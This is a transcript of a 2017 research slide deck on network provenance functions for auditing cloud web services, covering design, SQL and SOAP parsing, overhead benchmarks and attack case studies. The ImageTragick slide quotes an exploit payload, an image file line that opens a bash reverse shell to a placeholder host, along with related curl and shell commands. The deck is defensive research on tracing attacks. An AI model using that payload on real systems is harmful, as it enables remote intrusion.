transparent web service auditing via network provenance...

16
Transparent Web Service Auditing via Network Provenance Functions Adam Bates, Wajih Ul Hassan, Kevin Butler, Alin Dobra, Bradley Reaves, Patrick Cable, Thomas Moyer, Nabil Schear based upon work supported by the Assistant Secretary of Defense for Research and Engineering under Air No. FA8721-05-C-0002 and/or FA8702-15-D-0001. Any opinions, findings, conclusions or recommendations s material are those of the author(s) and do not necessarily reflect the views of the Assistant Secretary of search and Engineering. husetts Institute of Technology. Delivered to the U.S. Government with Unlimited Rights, as defined in DFARS Part 252.227-7013 or 7014 (F Notwithstanding any copyright notice, U.S. Government rights in this work are defined by DFARS 252.227-70 252.227-7014 as detailed above. Use of this work other than as specifically authorized by the U.S. Governm any copyrights that exist in this work.

Upload: vuongque

Post on 11-Apr-2018

223 views

Category:

Documents


3 download

TRANSCRIPT

Transparent Web Service Auditing via Network Provenance Functions

Adam Bates, Wajih Ul Hassan, Kevin Butler, Alin Dobra, Bradley Reaves, Patrick Cable, Thomas Moyer, Nabil Schear

This material is based upon work supported by the Assistant Secretary of Defense for Research and Engineering under Air Force Contract No. FA8721-05-C-0002 and/or FA8702-15-D-0001. Any opinions, findings, conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the Assistant Secretary of Defense for Research and Engineering.

© 2017 Massachusetts Institute of Technology.

Delivered to the U.S. Government with Unlimited Rights, as defined in DFARS Part 252.227-7013 or 7014 (Feb 2014). Notwithstanding any copyright notice, U.S. Government rights in this work are defined by DFARS 252.227-7013 or DFARS 252.227-7014 as detailed above. Use of this work other than as specifically authorized by the U.S. Government may violate any copyrights that exist in this work.

Presentation Name - 2 Author Initials MM/DD/YY

Motivation

•  Typical cloud-based web application –  Deployed in the cloud –  Running services on different nodes –  Complex interactions

•  Attack occurs –  How to track impact through application?

•  Defenses often focus on network boundaries, not internal services

MySQL

SquidProxies

CassandraMongoDB

Amazon EC2Instances Web

servers

Amazon EC2Instances

user 1 user 2 user i...

Applicationservers

Elastic Load Balancer

Clo

ud c

ode

serv

ers

Pushservers

Redis

Presentation Name - 3 Author Initials MM/DD/YY

Data Provenance

•  Data provenance is the history of ownership/processing to guide authenticity

•  Data provenance helps to answer:

Activity used wasGeneratedBy

wasAssociatedWith

wasDerivedFrom

wasAttributedTo wasAttributedTo

Entity Entity

Agent

Processes Data

Users, groups, other systems, etc… World Wide Web

Consortium

–  Where are all my data? –  Where did they come from?

–  Are the data secure and trustworthy? –  How to recover after being attacked?

Presentation Name - 4 Author Initials MM/DD/YY

Goals

1.  Complete System must offer a complete description of requests that flow through the web service

2.  Integrated System must combine provenance from different software components into complete record

3.  Widely Applicable Should not be limited to a particular application, backend component, or architecture

Presentation Name - 5 Author Initials MM/DD/YY

Threat Model

•  Attacker assumptions –  Launch network attacks against applications and

underlying infrastructure

•  Goals –  Command injection, e.g. SQL injection attacks against DB –  Data exfiltration or injection –  Gain foothold in system for further attacks, such as

lateral movement

•  Trust assumptions –  Applications are vulnerable to compromise –  At least one record of adversary access attempt is

recorded before successful compromise

Presentation Name - 6 Author Initials MM/DD/YY

System Design

•  Capturing provenance from system components

•  Manual instrumentation –  Add code to existing applications and

backend infrastructure

•  Network Provenance Functions –  Proxy connections between components –  Parse protocols to capture provenance

•  Components –  Provenance monitor –  Execution partitioning –  Network provenance functions –  Provenance recorder

Provenance RecorderServer Attack Graph

Query APITrash Collect

1

2

3

4

5

6

7

Provenance Flow Data Flow

Provenance Monitor

Database Server

Unmodified

Provenance Monitor

Web Server

ExecutionPartition

3

Provenance Monitor

Application Worker

Unmodified

Network Prov.Function

Proxy Server

Protocol Parser

Prov. Extractor

0

2

Presentation Name - 7 Author Initials MM/DD/YY

Protocol Parsers: SQL

•  Need to determine what columns are accessed as part of a SQL query

function function

MAXCONCAT

NAME NAME NAME

“employees”“lastname”“firstname”“id” 1,000,000

select_expr NAME

NAME

select_stmt

select_expr_list from_stmt

select_expr

expr

where_stmt

expr

COMPARISON

NUMBER

“salary”

Explicit Data Access Implicit Data Access Ephemeral Data

WasMemberOf

WasMemberOfWasMemberOfWasMemberOf

Used

Used

UsedUsed_Implicit

Used_Ephemeral

employees

id

firstname

lastname

salary

1,000,000

select_stmt

SELECT employee_id, CONCAT (firstname, lastname) FROM employees WHERE MAX(salary) > 1,000,000

Presentation Name - 8 Author Initials MM/DD/YY

Protocol Parsers: Simple Object Access Protocol

•  Simple Object Access Protocol (SOAP) enables remote procedure calls •  Requires web services description language (WSDL) file to parse messages

–  WSDL defines API for SOAP messages

Used Used Used

WasGeneratedBy

WasGeneratedBy

m:GetEndorsingBoarder

endorsingBoarder:Chris Englesmann

X.X.X.X

SOAP Request manufacturer:K2 model:FatBob

Presentation Name - 9 Author Initials MM/DD/YY

Implementation

•  Provenance monitor –  Linux Provenance Modules (LPM) with

Hi-Fi module enabled

•  Execution partition –  Modified Apache 2 web server –  Added <5 lines of code

•  Provenance recorder –  C++ using SNAP graph library

•  Network provenance function –  Multithreaded TCP proxy in C –  SQL parser using Bison

Provenance RecorderServer Attack Graph

Query APITrash Collect

1

2

3

4

5

6

7

Provenance Flow Data Flow

Provenance Monitor

Database Server

Unmodified

Provenance Monitor

Web Server

ExecutionPartition

3

Provenance Monitor

Application Worker

Unmodified

Network Prov.Function

Proxy Server

Protocol Parser

Prov. Extractor

0

2

Presentation Name - 10 Author Initials MM/DD/YY

Evaluation Overview

•  Physical host –  2.4 GHz Intel Xeon processors (2x4-cores) –  12 GB RAM –  VMware Fusion

•  Virtual machines –  CentOS 6.5 –  2 vCPUs –  4 GB RAM

•  Measurements –  End-to-end latency –  Microbenchmarks –  Case Studies

Presentation Name - 11 Author Initials MM/DD/YY

End-to-End Delay

•  Need to ensure that NPFs don’t make system unusable

•  Average overhead is ~11%, or at most 1ms per connection

BenchmarkTotal Database Average Time (ms) Percent

Queries Size (GB) w/o NPF with NPF Overhead

Dell DVD Store 6451 10 10.7 11.7 9.3

RUBiS 6430 1 6.5 7.2 11.2

WikiBench 6581 3 6.3 7.0 11.6

Presentation Name - 12 Author Initials MM/DD/YY

Microbenchmarks

•  Capture performance –  Parse query: 0.053ms on average –  Transmit provenance: 0.318ms on average

•  Query performance –  1.23ms on average –  7ms in the worst case –  0.5ms to build provenance graphs

0

0.1

0.2

0.3

0.4

0.5

0.6

0.7

0.8

0.9

1

0 0.1 0.2 0.3 0.4 0.5

Cum

ulat

ive

Dens

ity

Response Time (Milliseconds)

Unit StartUnit End

Parse QueryTransmit Prov 0

0.1

0.2

0.3

0.4

0.5

0.6

0.7

0.8

0.9

1

0 2 4 6 8 10

Cum

ulat

ive

Den

sity

Response Time (Milliseconds)

Presentation Name - 13 Author Initials MM/DD/YY

Case Study: SQL Injection Attack

•  Web application vulnerable to SQL injection (SQLi) attack –  Attackers often obfuscate queries to evade protections in applications

•  Fully tracking path of attack needs to consider many aspects of the system –  Network context, bypassed application logic, and database accesses

•  Existing audit solutions ill-suited to this task •  With NPF, admins create succinct policies about data crossing network boundaries

Used Used Used Used_Implicit

Used_Implicit Used

WasDerivedFrom WasDerivedFrom WasDerivedFrom WasDerivedFrom WasDerivedFrom

WasGeneratedBy

WasGeneratedBy

httpd worker 2021

X.X.X.X

name

customers

card_number card_expires

orders

id id

HTTP Response

HTTP Request

Presentation Name - 14 Author Initials MM/DD/YY

Case Study: ImageTragick

•  ImageTragick: arbitrary code execution •  Layer NPF with whole-system

provenance to track reverse shell through ImageTragick –  Evaluation uses Linux Provenance

Modules to track files created on system, e.g. reverse-shell.php

•  Attacker uploads file that created reverse shell on system

•  ImageMagick runs identify on file, executing code to create reverse shell

WasGeneratedBy

Used

WasGeneratedBy

Used Used WasTriggeredBy

WasTriggeredBy

WasTriggeredBy

WasTriggeredBy

WasGeneratedBy

WasTriggeredBy

WasTriggeredBy

X.X.X.X

HTTP Request

httpd worker 4435

uploads/rsh.jpg

identify uploads/rsh.jpg

libMagickCore.so.2.0.0

sh -c curl -s -k -o /tmp/magic

bash -i /dev/tcp/X.X.X.X/9999

vi htdocs/reverse-shell.php

reverse-shell.php

curl -s -k -o /tmp/magick-XX8MNK2f http

sh -c identify uploads/rsh.jpg

push graphic-context viewbox 0 0 640 480 image over 0,0 0,0 'https://127.0.0.1/x.php?x=` bash -i >& /dev/tcp/aaa.bbb.ccc.ddd/9999 0>&1`’ pop graphic-context

Presentation Name - 15 Author Initials MM/DD/YY

Summary

•  Web applications continue to exhibit vulnerabilities and a need for fine-grained auditing capabilities

•  Network provenance functions provide application developers with mechanisms to monitor and protect sensitive web services –  Minimally invasive –  Low overhead –  Widely applicable

Presentation Name - 16 Author Initials MM/DD/YY

Questions?